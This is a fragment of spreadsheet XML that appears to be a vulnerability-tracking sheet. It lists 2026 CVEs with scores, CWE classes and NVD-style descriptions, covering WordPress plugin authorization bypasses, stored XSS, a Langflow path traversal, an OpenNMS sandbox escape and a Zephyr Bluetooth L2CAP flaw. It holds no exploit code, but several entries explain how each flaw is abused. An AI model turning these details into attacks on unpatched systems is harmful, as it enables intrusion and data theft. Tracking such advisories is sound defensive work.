          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4829" s="5" t="inlineStr"/>
      <c r="K4829" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4829" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Ankaref Innovation and Technology Inc. LIBRID/LIBREF allows Stored XSS.
This issue affects LIBRID/LIBREF: from 2.01.0.2183 through 10092026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="M4829" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12682</t>
        </is>
      </c>
    </row>
    <row r="4830">
      <c r="A4830" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4830" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12683</t>
        </is>
      </c>
      <c r="C4830" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4830" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4830" s="5" t="inlineStr"/>
      <c r="F4830" s="5" t="inlineStr"/>
      <c r="G4830" s="5" t="inlineStr"/>
      <c r="H4830" s="5" t="inlineStr"/>
      <c r="I4830" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4830" s="5" t="inlineStr"/>
      <c r="K4830" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4830" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Ankaref Innovation and Technology Inc. LIBRID/LIBREF allows Stored XSS.
This issue affects LIBRID/LIBREF: from 2.01.0.2183 through 10092026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="M4830" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12683</t>
        </is>
      </c>
    </row>
    <row r="4831">
      <c r="A4831" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4831" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12843</t>
        </is>
      </c>
      <c r="C4831" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4831" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4831" s="5" t="inlineStr"/>
      <c r="F4831" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4831" s="5" t="inlineStr"/>
      <c r="H4831" s="5" t="inlineStr"/>
      <c r="I4831" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J4831" s="5" t="inlineStr"/>
      <c r="K4831" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4831" s="5" t="inlineStr">
        <is>
          <t>The LearnDash LMS plugin for WordPress is vulnerable to authorization bypass in versions 4.25.0 - 5.1.6. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to enroll arbitrary users in paid courses without payment verification, bypassing the entire payment system and gaining unauthorized access to premium educational content.</t>
        </is>
      </c>
      <c r="M4831" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12843</t>
        </is>
      </c>
    </row>
    <row r="4832">
      <c r="A4832" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4832" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12853</t>
        </is>
      </c>
      <c r="C4832" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4832" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4832" s="5" t="inlineStr"/>
      <c r="F4832" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4832" s="5" t="inlineStr"/>
      <c r="H4832" s="5" t="inlineStr"/>
      <c r="I4832" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4832" s="5" t="inlineStr"/>
      <c r="K4832" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4832" s="5" t="inlineStr">
        <is>
          <t>The Flamingo plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 2.6.2. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with contributor-level access and above, to enumerate taxonomy terms including channel names derived from Contact Form 7 form titles that may reveal internal form purposes, department names, or workflow identifiers, as well as submission counts per channel and contact tag names. The plugin's flamingo_map_meta_cap() filter restricts access to Flamingo's admin UI but does not extend to WordPress core APIs such as XML-RPC wp.getTerms and admin-ajax ajax-tag-search.</t>
        </is>
      </c>
      <c r="M4832" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12853</t>
        </is>
      </c>
    </row>
    <row r="4833">
      <c r="A4833" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4833" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14565</t>
        </is>
      </c>
      <c r="C4833" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4833" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4833" s="5" t="inlineStr"/>
      <c r="F4833" s="5" t="inlineStr"/>
      <c r="G4833" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4833" s="5" t="inlineStr"/>
      <c r="I4833" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J4833" s="5" t="inlineStr"/>
      <c r="K4833" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4833" s="5" t="inlineStr">
        <is>
          <t>The advanced-customized-prompts WordPress plugin through 1.0.1 does not perform any capability, ownership, or nonce check before saving popup configuration to a product, nor escape the stored values on output, allowing any authenticated user such as a subscriber to store JavaScript that executes in the browser of visitors viewing the affected product.</t>
        </is>
      </c>
      <c r="M4833" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14565</t>
        </is>
      </c>
    </row>
    <row r="4834">
      <c r="A4834" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4834" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15247</t>
        </is>
      </c>
      <c r="C4834" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4834" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4834" s="5" t="inlineStr"/>
      <c r="F4834" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4834" s="5" t="inlineStr"/>
      <c r="H4834" s="5" t="inlineStr"/>
      <c r="I4834" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J4834" s="5" t="inlineStr"/>
      <c r="K4834" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4834" s="5" t="inlineStr">
        <is>
          <t>The Search Atlas SEO  WordPress plugin before 2.6.24 does not perform a nonce or capability check before processing a settings update in one of its early-priority handlers, allowing any authenticated user such as a Subscriber to overwrite or delete the site's stored Google service-account credentials.</t>
        </is>
      </c>
      <c r="M4834" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15247</t>
        </is>
      </c>
    </row>
    <row r="4835">
      <c r="A4835" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4835" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15460</t>
        </is>
      </c>
      <c r="C4835" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4835" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4835" s="5" t="inlineStr"/>
      <c r="F4835" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4835" s="5" t="inlineStr"/>
      <c r="H4835" s="5" t="inlineStr"/>
      <c r="I4835" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4835" s="5" t="inlineStr"/>
      <c r="K4835" s="5" t="inlineStr">
        <is>
          <t>CWE-666</t>
        </is>
      </c>
      <c r="L4835" s="5" t="inlineStr">
        <is>
          <t>The Bluetooth Classic (BR/EDR) L2CAP receive handler bt_l2cap_br_recv() in subsys/bluetooth/host/classic/l2cap_br.c dispatched inbound data PDUs based only on the destination channel ID, without checking that the target channel had reached the BT_L2CAP_CONNECTED state. A dynamic channel is assigned its RX CID and added to the connection's channel list while still in BT_L2CAP_CONNECTING (and later BT_L2CAP_CONFIG) — before configuration completes and, for PSMs that require security, before the peer is authenticated (l2cap_br_conn_req()).
Because the channel is already findable by bt_l2cap_br_lookup_rx_cid() during this window, a remote peer within radio range can send a data PDU addressed to that CID and have it processed on a not-yet-established channel. The dispatch keys off channel fields (BR_CHAN(chan)-&gt;rx.mode, rx.mps) that are only initialized during configuration by l2cap_br_conf(); since channel objects are pooled and bt_l2cap_br_chan_del() does not reset rx.mode or the reassembly buffer _sdu, a reused channel can carry stale state into the CONNECTING window and route the frame into the retransmission/flow-control path (bt_l2cap_br_ret_fc_recv()) with stale parameters and a possibly stale _sdu pointer.
The impact is delivery of attacker data to upper-layer protocol handlers on a half-open (and possibly unauthenticated) channel, plus operation on stale or partially initialized channel state on reused channel objects — leading to channel/link teardown (denial of service) and, in the stale-_sdu case, a dangling-pointer condition. The fix adds an explicit BR_CHAN(chan)-&gt;state &lt; BT_L2CAP_CONNECTED guard that drops any data received before the channel is fully connected.</t>
        </is>
      </c>
      <c r="M4835" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15460</t>
        </is>
      </c>
    </row>
    <row r="4836">
      <c r="A4836" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4836" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16892</t>
        </is>
      </c>
      <c r="C4836" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4836" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4836" s="5" t="inlineStr"/>
      <c r="F4836" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4836" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H4836" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I4836" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4836" s="5" t="inlineStr"/>
      <c r="K4836" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L4836" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote authenticated attacker to bypass security restrictions due to improper authentication during service-name matching.</t>
        </is>
      </c>
      <c r="M4836" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16892</t>
        </is>
      </c>
    </row>
    <row r="4837">
      <c r="A4837" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4837" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17274</t>
        </is>
      </c>
      <c r="C4837" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4837" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4837" s="5" t="inlineStr"/>
      <c r="F4837" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4837" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H4837" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I4837" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4837" s="5" t="inlineStr"/>
      <c r="K4837" s="5" t="inlineStr">
        <is>
          <t>CWE-330</t>
        </is>
      </c>
      <c r="L4837" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote authenticated attacker to bypass security restrictions due to predictable server seeds.</t>
        </is>
      </c>
      <c r="M4837" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17274</t>
        </is>
      </c>
    </row>
    <row r="4838">
      <c r="A4838" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4838" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17621</t>
        </is>
      </c>
      <c r="C4838" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4838" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4838" s="5" t="inlineStr"/>
      <c r="F4838" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4838" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H4838" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I4838" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4838" s="5" t="inlineStr"/>
      <c r="K4838" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L4838" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.10.2 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot " sequences ( /.. /) to view arbitrary files on the system.</t>
        </is>
      </c>
      <c r="M4838" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17621</t>
        </is>
      </c>
    </row>
    <row r="4839">
      <c r="A4839" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4839" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18957</t>
        </is>
      </c>
      <c r="C4839" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4839" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4839" s="5" t="inlineStr"/>
      <c r="F4839" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4839" s="5" t="inlineStr"/>
      <c r="H4839" s="5" t="inlineStr"/>
      <c r="I4839" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4839" s="5" t="inlineStr"/>
      <c r="K4839" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4839" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Menulux Software Inc. Menulux Portal allows Stored XSS.
This issue affects Menulux Portal: before 20260903211448.</t>
        </is>
      </c>
      <c r="M4839" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18957</t>
        </is>
      </c>
    </row>
    <row r="4840">
      <c r="A4840" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4840" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19057</t>
        </is>
      </c>
      <c r="C4840" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4840" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4840" s="5" t="inlineStr"/>
      <c r="F4840" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4840" s="5" t="inlineStr"/>
      <c r="H4840" s="5" t="inlineStr"/>
      <c r="I4840" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4840" s="5" t="inlineStr"/>
      <c r="K4840" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4840" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Gastromenum Gastromenum Ticket and QR Menu System allows Stored XSS.
This issue affects Gastromenum Ticket and QR Menu System: before 2026.08.31.</t>
        </is>
      </c>
      <c r="M4840" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19057</t>
        </is>
      </c>
    </row>
    <row r="4841">
      <c r="A4841" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4841" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19135</t>
        </is>
      </c>
      <c r="C4841" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4841" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4841" s="5" t="inlineStr"/>
      <c r="F4841" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4841" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4841" s="5" t="inlineStr"/>
      <c r="I4841" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J4841" s="5" t="inlineStr"/>
      <c r="K4841" s="5" t="inlineStr">
        <is>
          <t>CWE-470</t>
        </is>
      </c>
      <c r="L4841" s="5" t="inlineStr">
        <is>
          <t>A JEXL expression sandbox bypass exists in multiple versions of OpenNMS Meridian and Horizon. A low-privileged authenticated user can submit a crafted expression to the Measurements REST API that escapes the sandbox and loads arbitrary Java classes on the server. This can potentially allow an attacker to gain access to confidential information and compromise integrity.
The solution is to upgrade to Meridian 2024.3.12, 2025.0.9 and Horizon 36.0.3 or newer. Meridian and Horizon installation instructions state that they are intended for installation within an organization's private networks and should not be directly accessible from the Internet.</t>
        </is>
      </c>
      <c r="M4841" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19135</t>
        </is>
      </c>
    </row>
    <row r="4842">
      <c r="A4842" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4842" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19479</t>
        </is>
      </c>
      <c r="C4842" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4842" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4842" s="5" t="inlineStr"/>
      <c r="F4842" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4842" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4842" s="5" t="inlineStr"/>
      <c r="I4842" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4842" s="5" t="inlineStr"/>
      <c r="K4842" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L484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842" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19479</t>
        </is>
      </c>
    </row>
    <row r="4843">
      <c r="A4843" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4843" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19612</t>
        </is>
      </c>
      <c r="C4843" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4843" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4843" s="5" t="inlineStr"/>
      <c r="F4843" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4843" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4843" s="5" t="inlineStr"/>
      <c r="I4843" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4843" s="5" t="inlineStr"/>
      <c r="K4843" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L484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843" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19612</t>
        </is>
      </c>
    </row>
    <row r="4844">
      <c r="A4844" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4844" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19644</t>
        </is>
      </c>
      <c r="C4844" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4844" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4844" s="5" t="inlineStr"/>
      <c r="F4844" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4844" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4844" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4844" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4844" s="5" t="inlineStr"/>
      <c r="K4844" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L484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844" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19644</t>
        </is>
      </c>
    </row>
    <row r="4845">
      <c r="A4845" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4845" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19713</t>
        </is>
      </c>
      <c r="C4845" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4845" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4845" s="5" t="inlineStr"/>
      <c r="F4845" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4845" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4845" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I4845" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4845" s="5" t="inlineStr"/>
      <c r="K4845" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L484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845" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19713</t>
        </is>
      </c>
    </row>
    <row r="4846">
      <c r="A4846" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4846" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21269</t>
        </is>
      </c>
      <c r="C4846" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4846" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4846" s="5" t="inlineStr"/>
      <c r="F4846" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4846" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4846" s="5" t="inlineStr">
        <is>
          <t>adobe:coldfusion</t>
        </is>
      </c>
      <c r="I4846" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J4846" s="5" t="inlineStr"/>
      <c r="K4846" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4846" s="5" t="inlineStr">
        <is>
          <t>ColdFusion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46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21269</t>
        </is>
      </c>
    </row>
    <row r="4847">
      <c r="A4847" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4847" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-2520</t>
        </is>
      </c>
      <c r="C4847" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4847" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4847" s="5" t="inlineStr"/>
      <c r="F4847" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4847" s="5" t="inlineStr"/>
      <c r="H4847" s="5" t="inlineStr"/>
      <c r="I4847" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4847" s="5" t="inlineStr"/>
      <c r="K4847" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4847" s="5" t="inlineStr">
        <is>
          <t>The Online Scheduling and Appointment Booking System – Bookly plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'updateAddon' function in all versions up to, and including, 27.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update any plugin with a main file of 'main.php' to its latest version.</t>
        </is>
      </c>
      <c r="M4847" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-2520</t>
        </is>
      </c>
    </row>
    <row r="4848">
      <c r="A4848" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4848" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27222</t>
        </is>
      </c>
      <c r="C4848" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4848" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4848" s="5" t="inlineStr"/>
      <c r="F4848" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4848" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, java</t>
        </is>
      </c>
      <c r="H4848" s="5" t="inlineStr">
        <is>
          <t>adobe:bridge, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I4848" s="5" t="inlineStr">
        <is>
          <t>2026-04-14</t>
        </is>
      </c>
      <c r="J4848" s="5" t="inlineStr"/>
      <c r="K4848" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L484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48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27222</t>
        </is>
      </c>
    </row>
    <row r="4849">
      <c r="A4849" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4849" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27227</t>
        </is>
      </c>
      <c r="C4849" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4849" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4849" s="5" t="inlineStr"/>
      <c r="F4849" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4849" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4849" s="5" t="inlineStr"/>
      <c r="I4849" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4849" s="5" t="inlineStr"/>
      <c r="K4849" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L484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49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27227</t>
        </is>
      </c>
    </row>
    <row r="4850">
      <c r="A4850" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4850" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27238</t>
        </is>
      </c>
      <c r="C4850" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4850" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4850" s="5" t="inlineStr"/>
      <c r="F4850" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4850" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, java</t>
        </is>
      </c>
      <c r="H4850" s="5" t="inlineStr">
        <is>
          <t>adobe:indesign, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I4850" s="5" t="inlineStr">
        <is>
          <t>2026-04-14</t>
        </is>
      </c>
      <c r="J4850" s="5" t="inlineStr"/>
      <c r="K4850" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L485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50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27238</t>
        </is>
      </c>
    </row>
    <row r="4851">
      <c r="A4851" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4851" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27258</t>
        </is>
      </c>
      <c r="C4851" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4851" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4851" s="5" t="inlineStr"/>
      <c r="F4851" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4851" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4851" s="5" t="inlineStr">
        <is>
          <t>adobe:dng_software_development_kit</t>
        </is>
      </c>
      <c r="I4851" s="5" t="inlineStr">
        <is>
          <t>2026-04-14</t>
        </is>
      </c>
      <c r="J4851" s="5" t="inlineStr"/>
      <c r="K4851" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L485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51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27258</t>
        </is>
      </c>
    </row>
